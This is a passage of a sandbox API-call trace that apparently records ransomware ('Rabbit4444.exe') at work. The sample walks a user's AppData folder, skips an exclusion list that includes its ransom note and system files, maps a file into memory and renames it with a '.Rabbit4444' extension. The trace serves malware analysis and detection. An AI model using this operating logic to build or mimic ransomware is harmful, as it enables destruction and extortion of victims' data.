lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.540] lstrcmpiW (lpString1="Google", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.540] lstrcmpiW (lpString1="Google", lpString2="Rabbit4444.exe") returned -1 [0054.540] lstrcmpiW (lpString1="Google", lpString2=".") returned 1 [0054.540] lstrcmpiW (lpString1="Google", lpString2="..") returned 1 [0054.540] lstrcmpiW (lpString1="Google", lpString2="windows") returned -1 [0054.540] lstrcmpiW (lpString1="Google", lpString2="bootmgr") returned 1 [0054.540] lstrcmpiW (lpString1="Google", lpString2="pagefile.sys") returned -1 [0054.540] lstrcmpiW (lpString1="Google", lpString2="boot") returned 1 [0054.540] lstrcmpiW (lpString1="Google", lpString2="ids.txt") returned -1 [0054.540] lstrcmpiW (lpString1="Google", lpString2="NTUSER.DAT") returned -1 [0054.540] lstrcpyW (in: lpString1=0x130eb74, lpString2="Google" | out: lpString1="Google") returned="Google" [0054.540] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6408 [0054.540] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x4a) returned 0x10cd98 [0054.540] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6410 | out: ListHead=0xf68b0, ListEntry=0xf6410) returned 0xf6670 [0054.540] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0054.540] lstrcmpiW (lpString1="History", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.540] lstrcmpiW (lpString1="History", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.540] lstrcmpiW (lpString1="History", lpString2="Rabbit4444.exe") returned -1 [0054.541] lstrcmpiW (lpString1="History", lpString2=".") returned 1 [0054.541] lstrcmpiW (lpString1="History", lpString2="..") returned 1 [0054.541] lstrcmpiW (lpString1="History", lpString2="windows") returned -1 [0054.541] lstrcmpiW (lpString1="History", lpString2="bootmgr") returned 1 [0054.541] lstrcmpiW (lpString1="History", lpString2="pagefile.sys") returned -1 [0054.541] lstrcmpiW (lpString1="History", lpString2="boot") returned 1 [0054.541] lstrcmpiW (lpString1="History", lpString2="ids.txt") returned -1 [0054.541] lstrcmpiW (lpString1="History", lpString2="NTUSER.DAT") returned -1 [0054.541] lstrcpyW (in: lpString1=0x130eb74, lpString2="History" | out: lpString1="History") returned="History" [0054.541] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\History", dwFileAttributes=0x2412) returned 1 [0054.541] wsprintfA (in: param_1=0x130e338, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\AppData\\Local\\History\r\n") returned 56 [0054.541] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\AppData\\Local\\History\r\n") returned 56 [0054.541] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.541] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa2e [0054.541] WriteFile (in: hFile=0x278, lpBuffer=0x130e338*, nNumberOfBytesToWrite=0x38, lpNumberOfBytesWritten=0x130daf4, lpOverlapped=0x0 | out: lpBuffer=0x130e338*, lpNumberOfBytesWritten=0x130daf4*=0x38, lpOverlapped=0x0) returned 1 [0054.543] CloseHandle (hObject=0x278) returned 1 [0054.543] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4a3b706e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x4a3b706e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x56f5f2ae, ftLastWriteTime.dwHighDateTime=0x1d4ae7c, nFileSizeHigh=0x0, nFileSizeLow=0x11110, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0054.543] lstrcmpiW (lpString1="IconCache.db", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.543] lstrcmpiW (lpString1="IconCache.db", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.543] lstrcmpiW (lpString1="IconCache.db", lpString2="Rabbit4444.exe") returned -1 [0054.543] lstrcmpiW (lpString1="IconCache.db", lpString2=".") returned 1 [0054.543] lstrcmpiW (lpString1="IconCache.db", lpString2="..") returned 1 [0054.543] lstrcmpiW (lpString1="IconCache.db", lpString2="windows") returned -1 [0054.543] lstrcmpiW (lpString1="IconCache.db", lpString2="bootmgr") returned 1 [0054.543] lstrcmpiW (lpString1="IconCache.db", lpString2="pagefile.sys") returned -1 [0054.544] lstrcmpiW (lpString1="IconCache.db", lpString2="boot") returned 1 [0054.544] lstrcmpiW (lpString1="IconCache.db", lpString2="ids.txt") returned -1 [0054.544] lstrcmpiW (lpString1="IconCache.db", lpString2="NTUSER.DAT") returned -1 [0054.544] lstrcpyW (in: lpString1=0x130eb74, lpString2="IconCache.db" | out: lpString1="IconCache.db") returned="IconCache.db" [0054.544] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\IconCache.db", dwFileAttributes=0x2) returned 1 [0054.544] lstrlenW (lpString="IconCache.db") returned 12 [0054.545] lstrlenW (lpString="Rabbit4444") returned 10 [0054.545] lstrcmpiW (lpString1="onCache.db", lpString2="Rabbit4444") returned -1 [0054.545] lstrlenW (lpString=".dll") returned 4 [0054.545] lstrcmpiW (lpString1="e.db", lpString2=".dll") returned 1 [0054.545] lstrlenW (lpString=".lnk") returned 4 [0054.545] lstrcmpiW (lpString1="e.db", lpString2=".lnk") returned 1 [0054.545] lstrlenW (lpString=".ini") returned 4 [0054.545] lstrcmpiW (lpString1="e.db", lpString2=".ini") returned 1 [0054.545] lstrlenW (lpString=".sys") returned 4 [0054.545] lstrcmpiW (lpString1="e.db", lpString2=".sys") returned 1 [0054.545] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\iconcache.db"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.545] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0054.545] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14585576770) returned 1 [0054.545] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=69904) returned 1 [0054.545] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0054.545] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0054.545] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11410, lpName=0x0) returned 0x298 [0054.545] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11410) returned 0x70000 [0054.548] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0054.548] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0054.548] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0054.548] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0054.548] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0054.549] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0054.549] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0054.549] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0054.549] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14585945857) returned 1 [0054.549] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0054.549] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0054.549] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.550] CloseHandle (hObject=0x298) returned 1 [0054.550] CloseHandle (hObject=0x278) returned 1 [0054.550] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\IconCache.db.Rabbit4444") returned 53 [0054.550] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\iconcache.db"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\IconCache.db.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\iconcache.db.rabbit4444"), dwFlags=0x1) returned 1 [0054.551] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xeff5a990, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xeff5a990, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0054.551] lstrcmpiW (lpString1="Microsoft", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.551] lstrcmpiW (lpString1="Microsoft", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.551] lstrcmpiW (lpString1="Microsoft", lpString2="Rabbit4444.exe") returned -1 [0054.551] lstrcmpiW (lpString1="Microsoft", lpString2=".") returned 1 [0054.551] lstrcmpiW (lpString1="Microsoft", lpString2="..") returned 1 [0054.551] lstrcmpiW (lpString1="Microsoft", lpString2="windows") returned -1 [0054.551] lstrcmpiW (lpString1="Microsoft", lpString2="bootmgr") returned 1 [0054.551] lstrcmpiW (lpString1="Microsoft", lpString2="pagefile.sys") returned -1 [0054.551] lstrcmpiW (lpString1="Microsoft", lpString2="boot") returned 1 [0054.551] lstrcmpiW (lpString1="Microsoft", lpString2="ids.txt") returned 1 [0054.551] lstrcmpiW (lpString1="Microsoft", lpString2="NTUSER.DAT") returned -1 [0054.551] lstrcpyW (in: lpString1=0x130eb74, lpString2="Microsoft" | out: lpString1="Microsoft") returned="Microsoft" [0054.551] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6428 [0054.551] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x50) returned 0x10d3f8 [0054.551] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6430 | out: ListHead=0xf68b0, ListEntry=0xf6430) returned 0xf6410 [0054.551] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4a9a8d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc895324f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd6772beb, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MicrosoftEdge", cAlternateFileName="MICROS~2")) returned 1 [0054.551] lstrcmpiW (lpString1="MicrosoftEdge", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.551] lstrcmpiW (lpString1="MicrosoftEdge", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.551] lstrcmpiW (lpString1="MicrosoftEdge", lpString2="Rabbit4444.exe") returned -1 [0054.551] lstrcmpiW (lpString1="MicrosoftEdge", lpString2=".") returned 1 [0054.551] lstrcmpiW (lpString1="MicrosoftEdge", lpString2="..") returned 1 [0054.551] lstrcmpiW (lpString1="MicrosoftEdge", lpString2="windows") returned -1 [0054.551] lstrcmpiW (lpString1="MicrosoftEdge", lpString2="bootmgr") returned 1 [0054.551] lstrcmpiW (lpString1="MicrosoftEdge", lpString2="pagefile.sys") returned -1 [0054.551] lstrcmpiW (lpString1="MicrosoftEdge", lpString2="boot") returned 1 [0054.551] lstrcmpiW (lpString1="MicrosoftEdge", lpString2="ids.txt") returned 1 [0054.551] lstrcmpiW (lpString1="MicrosoftEdge", lpString2="NTUSER.DAT") returned -1 [0054.551] lstrcpyW (in: lpString1=0x130eb74, lpString2="MicrosoftEdge" | out: lpString1="MicrosoftEdge") returned="MicrosoftEdge" [0054.551] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6388 [0054.552] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x58) returned 0x115bc8 [0054.552] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6390 | out: ListHead=0xf68b0, ListEntry=0xf6390) returned 0xf6430 [0054.552] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa9067e6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfa9067e6, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x190eac40, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0054.552] lstrcmpiW (lpString1="Mozilla", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.552] lstrcmpiW (lpString1="Mozilla", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.552] lstrcmpiW (lpString1="Mozilla", lpString2="Rabbit4444.exe") returned -1 [0054.552] lstrcmpiW (lpString1="Mozilla", lpString2=".") returned 1 [0054.552] lstrcmpiW (lpString1="Mozilla", lpString2="..") returned 1 [0054.552] lstrcmpiW (lpString1="Mozilla", lpString2="windows") returned -1 [0054.552] lstrcmpiW (lpString1="Mozilla", lpString2="bootmgr") returned 1 [0054.552] lstrcmpiW (lpString1="Mozilla", lpString2="pagefile.sys") returned -1 [0054.552] lstrcmpiW (lpString1="Mozilla", lpString2="boot") returned 1 [0054.552] lstrcmpiW (lpString1="Mozilla", lpString2="ids.txt") returned 1 [0054.552] lstrcmpiW (lpString1="Mozilla", lpString2="NTUSER.DAT") returned -1 [0054.552] lstrcpyW (in: lpString1=0x130eb74, lpString2="Mozilla" | out: lpString1="Mozilla") returned="Mozilla" [0054.552] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63a8 [0054.552] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x4c) returned 0xf1448 [0054.552] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63b0 | out: ListHead=0xf68b0, ListEntry=0xf63b0) returned 0xf6390 [0054.552] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xfe87ff8e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xfe87ff8e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Packages", cAlternateFileName="")) returned 1 [0054.552] lstrcmpiW (lpString1="Packages", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.552] lstrcmpiW (lpString1="Packages", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.552] lstrcmpiW (lpString1="Packages", lpString2="Rabbit4444.exe") returned -1 [0054.552] lstrcmpiW (lpString1="Packages", lpString2=".") returned 1 [0054.552] lstrcmpiW (lpString1="Packages", lpString2="..") returned 1 [0054.552] lstrcmpiW (lpString1="Packages", lpString2="windows") returned -1 [0054.552] lstrcmpiW (lpString1="Packages", lpString2="bootmgr") returned 1 [0054.552] lstrcmpiW (lpString1="Packages", lpString2="pagefile.sys") returned -1 [0054.552] lstrcmpiW (lpString1="Packages", lpString2="boot") returned 1 [0054.552] lstrcmpiW (lpString1="Packages", lpString2="ids.txt") returned 1 [0054.552] lstrcmpiW (lpString1="Packages", lpString2="NTUSER.DAT") returned 1 [0054.552] lstrcpyW (in: lpString1=0x130eb74, lpString2="Packages" | out: lpString1="Packages") returned="Packages" [0054.552] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6448 [0054.552] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x4e) returned 0xee618 [0054.553] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6450 | out: ListHead=0xf68b0, ListEntry=0xf6450) returned 0xf63b0 [0054.553] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf9e1b08, ftCreationTime.dwHighDateTime=0x1d32734, ftLastAccessTime.dwLowDateTime=0xd2f40fba, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xdf9e1b08, ftLastWriteTime.dwHighDateTime=0x1d32734, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PeerDistRepub", cAlternateFileName="PEERDI~1")) returned 1 [0054.553] lstrcmpiW (lpString1="PeerDistRepub", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.553] lstrcmpiW (lpString1="PeerDistRepub", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.553] lstrcmpiW (lpString1="PeerDistRepub", lpString2="Rabbit4444.exe") returned -1 [0054.553] lstrcmpiW (lpString1="PeerDistRepub", lpString2=".") returned 1 [0054.553] lstrcmpiW (lpString1="PeerDistRepub", lpString2="..") returned 1 [0054.553] lstrcmpiW (lpString1="PeerDistRepub", lpString2="windows") returned -1 [0054.553] lstrcmpiW (lpString1="PeerDistRepub", lpString2="bootmgr") returned 1 [0054.553] lstrcmpiW (lpString1="PeerDistRepub", lpString2="pagefile.sys") returned 1 [0054.553] lstrcmpiW (lpString1="PeerDistRepub", lpString2="boot") returned 1 [0054.553] lstrcmpiW (lpString1="PeerDistRepub", lpString2="ids.txt") returned 1 [0054.553] lstrcmpiW (lpString1="PeerDistRepub", lpString2="NTUSER.DAT") returned 1 [0054.553] lstrcpyW (in: lpString1=0x130eb74, lpString2="PeerDistRepub" | out: lpString1="PeerDistRepub") returned="PeerDistRepub" [0054.553] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6488 [0054.553] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x58) returned 0x115748 [0054.553] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6490 | out: ListHead=0xf68b0, ListEntry=0xf6490) returned 0xf6450 [0054.553] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3e09841, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2f421af, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe3e09841, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Publishers", cAlternateFileName="PUBLIS~1")) returned 1 [0054.553] lstrcmpiW (lpString1="Publishers", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.553] lstrcmpiW (lpString1="Publishers", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.553] lstrcmpiW (lpString1="Publishers", lpString2="Rabbit4444.exe") returned -1 [0054.553] lstrcmpiW (lpString1="Publishers", lpString2=".") returned 1 [0054.553] lstrcmpiW (lpString1="Publishers", lpString2="..") returned 1 [0054.553] lstrcmpiW (lpString1="Publishers", lpString2="windows") returned -1 [0054.553] lstrcmpiW (lpString1="Publishers", lpString2="bootmgr") returned 1 [0054.553] lstrcmpiW (lpString1="Publishers", lpString2="pagefile.sys") returned 1 [0054.553] lstrcmpiW (lpString1="Publishers", lpString2="boot") returned 1 [0054.553] lstrcmpiW (lpString1="Publishers", lpString2="ids.txt") returned 1 [0054.553] lstrcmpiW (lpString1="Publishers", lpString2="NTUSER.DAT") returned 1 [0054.553] lstrcpyW (in: lpString1=0x130eb74, lpString2="Publishers" | out: lpString1="Publishers") returned="Publishers" [0054.553] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf64a8 [0054.553] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x52) returned 0x1156e8 [0054.553] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf64b0 | out: ListHead=0xf68b0, ListEntry=0xf64b0) returned 0xf6490 [0054.553] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xd91c6826, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xd91c6826, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0054.554] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.554] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.554] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0054.554] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0054.554] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0054.554] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0054.554] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0054.554] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0054.554] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0054.554] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0054.554] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0054.554] lstrcpyW (in: lpString1=0x130eb74, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0054.554] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6508 [0054.554] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x46) returned 0x10b5b0 [0054.554] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6510 | out: ListHead=0xf68b0, ListEntry=0xf6510) returned 0xf64b0 [0054.554] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0054.554] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.554] lstrcmpiW (lpString1="Temporary Internet Files", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.554] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="Rabbit4444.exe") returned 1 [0054.554] lstrcmpiW (lpString1="Temporary Internet Files", lpString2=".") returned 1 [0054.554] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="..") returned 1 [0054.554] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="windows") returned -1 [0054.554] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="bootmgr") returned 1 [0054.554] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="pagefile.sys") returned 1 [0054.554] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="boot") returned 1 [0054.554] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="ids.txt") returned 1 [0054.554] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="NTUSER.DAT") returned 1 [0054.554] lstrcpyW (in: lpString1=0x130eb74, lpString2="Temporary Internet Files" | out: lpString1="Temporary Internet Files") returned="Temporary Internet Files" [0054.554] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temporary Internet Files", dwFileAttributes=0x2412) returned 1 [0054.555] wsprintfA (in: param_1=0x130e338, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\AppData\\Local\\Temporary Internet Files\r\n") returned 73 [0054.555] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\AppData\\Local\\Temporary Internet Files\r\n") returned 73 [0054.555] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.555] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0054.555] WriteFile (in: hFile=0x278, lpBuffer=0x130e338*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x130daf4, lpOverlapped=0x0 | out: lpBuffer=0x130e338*, lpNumberOfBytesWritten=0x130daf4*=0x49, lpOverlapped=0x0) returned 1 [0054.556] CloseHandle (hObject=0x278) returned 1 [0054.557] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cdbf8a7, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd2fbd0ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3cdbf8a7, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TileDataLayer", cAlternateFileName="TILEDA~1")) returned 1 [0054.557] lstrcmpiW (lpString1="TileDataLayer", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.557] lstrcmpiW (lpString1="TileDataLayer", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.557] lstrcmpiW (lpString1="TileDataLayer", lpString2="Rabbit4444.exe") returned 1 [0054.557] lstrcmpiW (lpString1="TileDataLayer", lpString2=".") returned 1 [0054.557] lstrcmpiW (lpString1="TileDataLayer", lpString2="..") returned 1 [0054.557] lstrcmpiW (lpString1="TileDataLayer", lpString2="windows") returned -1 [0054.557] lstrcmpiW (lpString1="TileDataLayer", lpString2="bootmgr") returned 1 [0054.557] lstrcmpiW (lpString1="TileDataLayer", lpString2="pagefile.sys") returned 1 